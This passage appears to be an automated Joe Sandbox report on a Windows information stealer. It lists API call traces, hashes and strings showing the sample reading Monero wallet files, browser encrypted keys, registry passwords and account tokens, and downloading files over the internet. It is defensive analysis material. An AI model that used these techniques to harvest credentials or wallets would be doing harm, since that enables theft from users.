                              • Associated: 00000000.00000002.2084582320.0000000000AEA000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2085054907.0000000000AFE000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2085054907.0000000000C8A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2085054907.0000000000D6D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2085054907.0000000000D92000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2085054907.0000000000D9C000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2085054907.0000000000DAA000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2086118949.0000000000DAB000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2086265926.0000000000F4D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2086287887.0000000000F4E000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_8a0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Internetlstrcpylstrlen$HttpOpenRequest$AllocConnectLocalOptionSend
                              • String ID: ERROR$ERROR$ERROR$ERROR$ERROR
                              • API String ID: 3240024479-1526165396
                              • Opcode ID: a4609b2b8c91058c6176c6633964fa1be95ccde9b7b2fa97c437961166f3a8d3
                              • Instruction ID: d1ae5f0987bbdb2fd2a63153a92614dfb162b92c61d46f2e0179db6e28050313
                              • Opcode Fuzzy Hash: a4609b2b8c91058c6176c6633964fa1be95ccde9b7b2fa97c437961166f3a8d3
                              • Instruction Fuzzy Hash: 2551B070910149ABDB28EF68C996AED7779FF10301F504028E446DAAA2DF346B46CB63
                              Memory Dump Source
                              • Source File: 00000000.00000002.2084582320.00000000008A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                              • Associated: 00000000.00000002.2084561032.00000000008A0000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2084582320.0000000000951000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2084582320.000000000095D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2084582320.0000000000982000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2084582320.0000000000AEA000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2085054907.0000000000AFE000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2085054907.0000000000C8A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2085054907.0000000000D6D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2085054907.0000000000D92000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2085054907.0000000000D9C000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2085054907.0000000000DAA000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2086118949.0000000000DAB000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2086265926.0000000000F4D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2086287887.0000000000F4E000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_8a0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpylstrlen
                              • String ID:
                              • API String ID: 2001356338-0
                              • Opcode ID: 84cf02b8ab08bd59a93d8627916894daf1784114419ac9dbf96a16a154b613d5
                              • Instruction ID: 168ec4b2e3e6dbec85bac0f4d65c7e2618e26bb65b80d70429852bf5fe21c24d
                              • Opcode Fuzzy Hash: 84cf02b8ab08bd59a93d8627916894daf1784114419ac9dbf96a16a154b613d5
                              • Instruction Fuzzy Hash: CDC196B590011DABCF18EFA4DCD9FDA7778FB64304F004598E10AAB241DB70AA85CF92
                              APIs
                                • Part of subcall function 008B8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 008B8E0B
                              • lstrcat.KERNEL32(?,00000000), ref: 008B42EC
                              • lstrcat.KERNEL32(?,0142EB90), ref: 008B430B
                              • lstrcat.KERNEL32(?,?), ref: 008B431F
                              • lstrcat.KERNEL32(?,0142C8F0), ref: 008B4333
                                • Part of subcall function 008BA740: lstrcpy.KERNEL32(008C0E17,00000000), ref: 008BA788
                                • Part of subcall function 008B8D90: GetFileAttributesA.KERNEL32(00000000,?,008A1B54,?,?,008C564C,?,?,008C0E1F), ref: 008B8D9F
                                • Part of subcall function 008A9CE0: StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 008A9D39
                                • Part of subcall function 008A99C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 008A99EC
                                • Part of subcall function 008A99C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 008A9A11
                                • Part of subcall function 008A99C0: LocalAlloc.KERNEL32(00000040,?), ref: 008A9A31
                                • Part of subcall function 008A99C0: ReadFile.KERNEL32(000000FF,?,00000000,008A148F,00000000), ref: 008A9A5A
                                • Part of subcall function 008A99C0: LocalFree.KERNEL32(008A148F), ref: 008A9A90
                                • Part of subcall function 008A99C0: CloseHandle.KERNEL32(000000FF), ref: 008A9A9A
                                • Part of subcall function 008B93C0: GlobalAlloc.KERNEL32(00000000,008B43DD,008B43DD), ref: 008B93D3
                              • StrStrA.SHLWAPI(?,0142E998), ref: 008B43F3
                              • GlobalFree.KERNEL32(?), ref: 008B4512
                                • Part of subcall function 008A9AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,008A4EEE,00000000,00000000), ref: 008A9AEF
                                • Part of subcall function 008A9AC0: LocalAlloc.KERNEL32(00000040,?,?,?,008A4EEE,00000000,?), ref: 008A9B01
                                • Part of subcall function 008A9AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,008A4EEE,00000000,00000000), ref: 008A9B2A
                                • Part of subcall function 008A9AC0: LocalFree.KERNEL32(?,?,?,?,008A4EEE,00000000,?), ref: 008A9B3F
                              • lstrcat.KERNEL32(?,00000000), ref: 008B44A3
                              • StrCmpCA.SHLWAPI(?,008C08D1), ref: 008B44C0
                              • lstrcat.KERNEL32(00000000,00000000), ref: 008B44D2
                              • lstrcat.KERNEL32(00000000,?), ref: 008B44E5
                              • lstrcat.KERNEL32(00000000,008C0FB8), ref: 008B44F4
                              Memory Dump Source
                              • Source File: 00000000.00000002.2084582320.00000000008A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                              • Associated: 00000000.00000002.2084561032.00000000008A0000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2084582320.0000000000951000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2084582320.000000000095D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2084582320.0000000000982000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2084582320.0000000000AEA000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2085054907.0000000000AFE000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2085054907.0000000000C8A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2085054907.0000000000D6D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2085054907.0000000000D92000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2085054907.0000000000D9C000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2085054907.0000000000DAA000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2086118949.0000000000DAB000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2086265926.0000000000F4D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2086287887.0000000000F4E000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_8a0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$FileLocal$AllocFree$BinaryCryptGlobalString$AttributesCloseCreateFolderHandlePathReadSizelstrcpy
                              • String ID:
                              • API String ID: 3541710228-0
                              • Opcode ID: 8677f552ec91dc9f91143c3af4e97e945c5798ed558c31b94e5294b68570b9b4
                              • Instruction ID: ef6a1eddf86bd1631cd057f40ee39237046ed7072980bcc49c0505e12e608618
                              • Opcode Fuzzy Hash: 8677f552ec91dc9f91143c3af4e97e945c5798ed558c31b94e5294b68570b9b4
                              • Instruction Fuzzy Hash: 597125B6900208ABDB14EBE4DC96FEE7779FB58700F044598F605D7281EA34EB45CB92
                              APIs
                                • Part of subcall function 008A12A0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 008A12B4
                                • Part of subcall function 008A12A0: RtlAllocateHeap.NTDLL(00000000), ref: 008A12BB
                                • Part of subcall function 008A12A0: RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 008A12D7
                                • Part of subcall function 008A12A0: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 008A12F5
                                • Part of subcall function 008A12A0: RegCloseKey.ADVAPI32(?), ref: 008A12FF
                              • lstrcat.KERNEL32(?,00000000), ref: 008A134F
                              • lstrlen.KERNEL32(?), ref: 008A135C
                              • lstrcat.KERNEL32(?,.keys), ref: 008A1377
                                • Part of subcall function 008BA740: lstrcpy.KERNEL32(008C0E17,00000000), ref: 008BA788
                                • Part of subcall function 008BA9B0: lstrlen.KERNEL32(?,01428900,?,\Monero\wallet.keys,008C0E17), ref: 008BA9C5
                                • Part of subcall function 008BA9B0: lstrcpy.KERNEL32(00000000), ref: 008BAA04
                                • Part of subcall function 008BA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 008BAA12
                                • Part of subcall function 008BA8A0: lstrcpy.KERNEL32(?,008C0E17), ref: 008BA905
                                • Part of subcall function 008B8B60: GetSystemTime.KERNEL32(008C0E1A,01429D18,008C05AE,?,?,008A13F9,?,0000001A,008C0E1A,00000000,?,01428900,?,\Monero\wallet.keys,008C0E17), ref: 008B8B86
                                • Part of subcall function 008BA920: lstrcpy.KERNEL32(00000000,?), ref: 008BA972
                                • Part of subcall function 008BA920: lstrcat.KERNEL32(00000000), ref: 008BA982
                              • CopyFileA.KERNEL32(?,00000000,00000001), ref: 008A1465
                                • Part of subcall function 008BA7A0: lstrcpy.KERNEL32(?,00000000), ref: 008BA7E6
                                • Part of subcall function 008A99C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 008A99EC
                                • Part of subcall function 008A99C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 008A9A11
                                • Part of subcall function 008A99C0: LocalAlloc.KERNEL32(00000040,?), ref: 008A9A31
                                • Part of subcall function 008A99C0: ReadFile.KERNEL32(000000FF,?,00000000,008A148F,00000000), ref: 008A9A5A
                                • Part of subcall function 008A99C0: LocalFree.KERNEL32(008A148F), ref: 008A9A90
                                • Part of subcall function 008A99C0: CloseHandle.KERNEL32(000000FF), ref: 008A9A9A
                              • DeleteFileA.KERNEL32(00000000), ref: 008A14EF
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2084582320.00000000008A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                              • Associated: 00000000.00000002.2084561032.00000000008A0000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2084582320.0000000000951000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2084582320.000000000095D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2084582320.0000000000982000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2084582320.0000000000AEA000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2085054907.0000000000AFE000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2085054907.0000000000C8A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2085054907.0000000000D6D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2085054907.0000000000D92000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2085054907.0000000000D9C000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2085054907.0000000000DAA000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2086118949.0000000000DAB000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2086265926.0000000000F4D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2086287887.0000000000F4E000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_8a0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Filelstrcpy$lstrcat$CloseHeapLocallstrlen$AllocAllocateCopyCreateDeleteFreeHandleOpenProcessQueryReadSizeSystemTimeValue
                              • String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
                              • API String ID: 3478931302-218353709
                              • Opcode ID: ed73b25cc48a5bc7a4de04cf69ddfa189fa52cf186c8561798495ccf52ba8901
                              • Instruction ID: 603dc8d5720444cf84c198d7239fc9d7f036c708b399d550003a130dca709bc8
                              • Opcode Fuzzy Hash: ed73b25cc48a5bc7a4de04cf69ddfa189fa52cf186c8561798495ccf52ba8901
                              • Instruction Fuzzy Hash: 265145B1D5011967DB19EB64DC96FED733CFB54700F4041A8B60AE2191EE306B86CBA7
                              APIs
                                • Part of subcall function 008A72D0: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 008A733A
                                • Part of subcall function 008A72D0: RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 008A73B1
                                • Part of subcall function 008A72D0: StrStrA.SHLWAPI(00000000,Password,00000000), ref: 008A740D
                                • Part of subcall function 008A72D0: GetProcessHeap.KERNEL32(00000000,?), ref: 008A7452
                                • Part of subcall function 008A72D0: HeapFree.KERNEL32(00000000), ref: 008A7459
                              • lstrcat.KERNEL32(00000000,008C17FC), ref: 008A7606
                              • lstrcat.KERNEL32(00000000,00000000), ref: 008A7648
                              • lstrcat.KERNEL32(00000000, : ), ref: 008A765A
                              • lstrcat.KERNEL32(00000000,00000000), ref: 008A768F
                              • lstrcat.KERNEL32(00000000,008C1804), ref: 008A76A0
                              • lstrcat.KERNEL32(00000000,00000000), ref: 008A76D3
                              • lstrcat.KERNEL32(00000000,008C1808), ref: 008A76ED
                              • task.LIBCPMTD ref: 008A76FB
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2084582320.00000000008A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_8a0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$Heap$EnumFreeOpenProcessValuetask
                              • String ID: :
                              • API String ID: 2677904052-3653984579
                              • Opcode ID: 359ac526d954dc3d878cf5fe33a0d126d86f0777eed5cdbccca9b33386edebb0
                              • Instruction ID: 608ffe7e61b32617f9d195b4607afb47047f2cd0633716147b02a374aa5dbdf5
                              • Opcode Fuzzy Hash: 359ac526d954dc3d878cf5fe33a0d126d86f0777eed5cdbccca9b33386edebb0
                              • Instruction Fuzzy Hash: F5311A71D00149DFDB08EBE8DC99EEE7778FB66301F144118F102EB691DA34A946DB62
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,0142E740,00000000,?,008C0E2C,00000000,?,00000000), ref: 008B8130
                              • RtlAllocateHeap.NTDLL(00000000), ref: 008B8137
                              • GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 008B8158
                              • __aulldiv.LIBCMT ref: 008B8172
                              • __aulldiv.LIBCMT ref: 008B8180
                              • wsprintfA.USER32 ref: 008B81AC
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2084582320.00000000008A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_8a0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap__aulldiv$AllocateGlobalMemoryProcessStatuswsprintf
                              • String ID: %d MB$@
                              • API String ID: 2774356765-3474575989
                              • Opcode ID: b3d1bb72fc3c309ec1d9a72eb8405ca4ce809a8d40645bab26918b45a6a48fa4
                              • Instruction ID: 13b7babff64258fd39b56a4c3262680befa601a5bf0342b551d5c6e48d6c7094
                              • Opcode Fuzzy Hash: b3d1bb72fc3c309ec1d9a72eb8405ca4ce809a8d40645bab26918b45a6a48fa4
                              • Instruction Fuzzy Hash: F521EAB1E44358ABDB10DFD8CC49FAEBBB8FB44B14F104619F615BB280D77869018BA5
                              APIs
                                • Part of subcall function 008BA7A0: lstrcpy.KERNEL32(?,00000000), ref: 008BA7E6
                                • Part of subcall function 008A47B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 008A4839
                                • Part of subcall function 008A47B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 008A4849
                              • InternetOpenA.WININET(008C0DF7,00000001,00000000,00000000,00000000), ref: 008A610F
                              • StrCmpCA.SHLWAPI(?,0142F028), ref: 008A6147
                              • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 008A618F
                              • CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 008A61B3
                              • InternetReadFile.WININET(?,?,00000400,?), ref: 008A61DC
                              • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 008A620A
                              • CloseHandle.KERNEL32(?,?,00000400), ref: 008A6249
                              • InternetCloseHandle.WININET(?), ref: 008A6253
                              • InternetCloseHandle.WININET(00000000), ref: 008A6260
                              Memory Dump Source
                              • Source File: 00000000.00000002.2084582320.00000000008A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_8a0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Internet$CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
                              • String ID:
                              • API String ID: 2507841554-0
                              • Opcode ID: 4dbf70ec81d2c6040e8f3648528304653b6d791da0349d1ef26c999888cf4c77
                              • Instruction ID: b4952e40646099146010dfa590e7c6ddd598e18ba96521d16650f755deca1db1
                              • Opcode Fuzzy Hash: 4dbf70ec81d2c6040e8f3648528304653b6d791da0349d1ef26c999888cf4c77
                              • Instruction Fuzzy Hash: 605165B1900218ABEF24DFA4DC85BEE7778FB44705F108098B605E71C5EB746A85CF56
                              APIs
                              • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 008A733A
                              • RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 008A73B1
                              • StrStrA.SHLWAPI(00000000,Password,00000000), ref: 008A740D
                              • GetProcessHeap.KERNEL32(00000000,?), ref: 008A7452
                              • HeapFree.KERNEL32(00000000), ref: 008A7459
                              • task.LIBCPMTD ref: 008A7555
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2084582320.00000000008A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_8a0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$EnumFreeOpenProcessValuetask
                              • String ID: Password
                              • API String ID: 775622407-3434357891
                              • Opcode ID: 91b6ac3a435d1193e4629993affeea9617ae97c3033c550f512c4a5ac8f492fd
                              • Instruction ID: 05dd69e0d1458c61413453358154c1826963960248fe9f789955a2c7eac81213
                              • Opcode Fuzzy Hash: 91b6ac3a435d1193e4629993affeea9617ae97c3033c550f512c4a5ac8f492fd
                              • Instruction Fuzzy Hash: C0612BB5D0416C9BEB24DB54CC85BD9B7B8FF49300F0081E9E689A6541EB706BC9CFA1
                              APIs
                                • Part of subcall function 008BA740: lstrcpy.KERNEL32(008C0E17,00000000), ref: 008BA788
                                • Part of subcall function 008BA9B0: lstrlen.KERNEL32(?,01428900,?,\Monero\wallet.keys,008C0E17), ref: 008BA9C5
                                • Part of subcall function 008BA9B0: lstrcpy.KERNEL32(00000000), ref: 008BAA04
                                • Part of subcall function 008BA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 008BAA12
                                • Part of subcall function 008BA920: lstrcpy.KERNEL32(00000000,?), ref: 008BA972
                                • Part of subcall function 008BA920: lstrcat.KERNEL32(00000000), ref: 008BA982
                                • Part of subcall function 008BA8A0: lstrcpy.KERNEL32(?,008C0E17), ref: 008BA905
                                • Part of subcall function 008BA7A0: lstrcpy.KERNEL32(?,00000000), ref: 008BA7E6
                              • lstrlen.KERNEL32(00000000), ref: 008ABC9F
                                • Part of subcall function 008B8E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 008B8E52
                              • StrStrA.SHLWAPI(00000000,AccountId), ref: 008ABCCD
                              • lstrlen.KERNEL32(00000000), ref: 008ABDA5
                              • lstrlen.KERNEL32(00000000), ref: 008ABDB9
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2084582320.00000000008A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_8a0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrlen$lstrcat$AllocLocal
                              • String ID: AccountId$AccountTokens$AccountTokens$SELECT service, encrypted_token FROM token_service
                              • API String ID: 3073930149-1079375795
                              • Opcode ID: 5b03e7509f96d073cee0456ba278b82adfa7f75d4a2d9cdbcda11e5fc1672585
                              • Instruction ID: 287823a35e116593494cc5ef109b88cbcb4249541353edacfb974a991a976a8f
                              • Opcode Fuzzy Hash: 5b03e7509f96d073cee0456ba278b82adfa7f75d4a2d9cdbcda11e5fc1672585
                              • Instruction Fuzzy Hash: 03B11F71910108ABDF18EBA4DD96EEE7738FF54300F404168F506E66A2EF346A49CB63
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2084582320.00000000008A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_8a0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: ExitProcess$DefaultLangUser
                              • String ID: *
                              • API String ID: 1494266314-163128923
                              • Opcode ID: 5f880880dba1410df44d1344697dc5174ef1199599e2adcbb0f60362dee0d224
                              • Instruction ID: 405a1ea71c04560ecf7f4b9653e8cc2a8ef9d7cc58df7186c07f44dae6195b93
                              • Opcode Fuzzy Hash: 5f880880dba1410df44d1344697dc5174ef1199599e2adcbb0f60362dee0d224
                              • Instruction Fuzzy Hash: F6F08275904289EFD344DFE0E94976C7B70FB14703F040298F609CA390EA746B52DB96
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 008A4FCA
                              • RtlAllocateHeap.NTDLL(00000000), ref: 008A4FD1
                              • InternetOpenA.WININET(008C0DDF,00000000,00000000,00000000,00000000), ref: 008A4FEA
                              • InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 008A5011
                              • InternetReadFile.WININET(?,?,00000400,00000000), ref: 008A5041
                              • InternetCloseHandle.WININET(?), ref: 008A50B9
                              • InternetCloseHandle.WININET(?), ref: 008A50C6
                              Memory Dump Source
                              • Source File: 00000000.00000002.2084582320.00000000008A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_8a0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessRead
                              • String ID:
                              • API String ID: 3066467675-0
                              • Opcode ID: 2b34c8a1efe39af4a3c1893976d3fd432c1ffaf8bf180ac99c01d3e9992b668e
                              • Instruction ID: dd8cca0e6b7324769e3ae3ef8c7454f97c422684383987ec453efdcd2cae2765
                              • Opcode Fuzzy Hash: 2b34c8a1efe39af4a3c1893976d3fd432c1ffaf8bf180ac99c01d3e9992b668e
                              • Instruction Fuzzy Hash: DD31E4B4A0021CABDB20CF94DC85BDDB7B4FB48704F1081D9EB09A7281D7706AC68F99
                              APIs
                              • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 008B8426
                              • wsprintfA.USER32 ref: 008B8459
                              • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 008B847B
                              • RegCloseKey.ADVAPI32(00000000), ref: 008B848C
                              • RegCloseKey.ADVAPI32(00000000), ref: 008B8499
                                • Part of subcall function 008BA7A0: lstrcpy.KERNEL32(?,00000000), ref: 008BA7E6
                              • RegQueryValueExA.ADVAPI32(00000000,0142E698,00000000,000F003F,?,00000400), ref: 008B84EC
                              • lstrlen.KERNEL32(?), ref: 008B8501
                              • RegQueryValueExA.ADVAPI32(00000000,0142E920,00000000,000F003F,?,00000400,00000000,?,?,00000000,?,008C0B34), ref: 008B8599
                              • RegCloseKey.ADVAPI32(00000000), ref: 008B8608
                              • RegCloseKey.ADVAPI32(00000000), ref: 008B861A
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2084582320.00000000008A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_8a0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Close$QueryValue$EnumOpenlstrcpylstrlenwsprintf
                              • String ID: %s\%s
                              • API String ID: 3896182533-4073750446
                              • Opcode ID: 7b1e29486427b69a4ff2e20a4209a56c9afd37853c2542f01da32e92a9ad906b
                              • Instruction ID: abcbfb403e0a8d1b0803ad4c0d1c2c3cbbf3130962cf1a230686410de17121c4
                              • Opcode Fuzzy Hash: 7b1e29486427b69a4ff2e20a4209a56c9afd37853c2542f01da32e92a9ad906b
                              • Instruction Fuzzy Hash: A221E97191021CABDB24DB54DC85FE9B7B8FB58700F00C5D8E609A6240DF71AA86CFE5
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104), ref: 008B76A4
                              • RtlAllocateHeap.NTDLL(00000000), ref: 008B76AB
                              • RegOpenKeyExA.ADVAPI32(80000002,0141B660,00000000,00020119,00000000), ref: 008B76DD
                              • RegQueryValueExA.ADVAPI32(00000000,0142E770,00000000,00000000,?,000000FF), ref: 008B76FE
                              • RegCloseKey.ADVAPI32(00000000), ref: 008B7708
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2084582320.00000000008A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                               • Associated: 00000000.00000002.2084561032.00000000008A0000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2084582320.0000000000951000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2084582320.000000000095D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2084582320.0000000000982000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2084582320.0000000000AEA000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2085054907.0000000000AFE000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2085054907.0000000000C8A000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2085054907.0000000000D6D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2085054907.0000000000D92000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2085054907.0000000000D9C000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2085054907.0000000000DAA000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2086118949.0000000000DAB000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2086265926.0000000000F4D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2086287887.0000000000F4E000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_8a0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateCloseOpenProcessQueryValue
                              • String ID: Windows 11
                              • API String ID: 3225020163-2517555085
                              • Opcode ID: 49f7af07d16917a5a946530f5c37dca0f205afa27cd58c79546bbf06c259cffe
                              • Instruction ID: 7f989ded5c41464f380e95074e4045e381b59ff07f7397447e47c5bab92314bd
                              • Opcode Fuzzy Hash: 49f7af07d16917a5a946530f5c37dca0f205afa27cd58c79546bbf06c259cffe
                              • Instruction Fuzzy Hash: 220162B5A04308BFD700DBE4DC89FAEBBB8EB58701F108054FA05DB290DA70A9058B52
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104), ref: 008B7734
                              • RtlAllocateHeap.NTDLL(00000000), ref: 008B773B
                              • RegOpenKeyExA.ADVAPI32(80000002,0141B660,00000000,00020119,008B76B9), ref: 008B775B
                              • RegQueryValueExA.ADVAPI32(008B76B9,CurrentBuildNumber,00000000,00000000,?,000000FF), ref: 008B777A
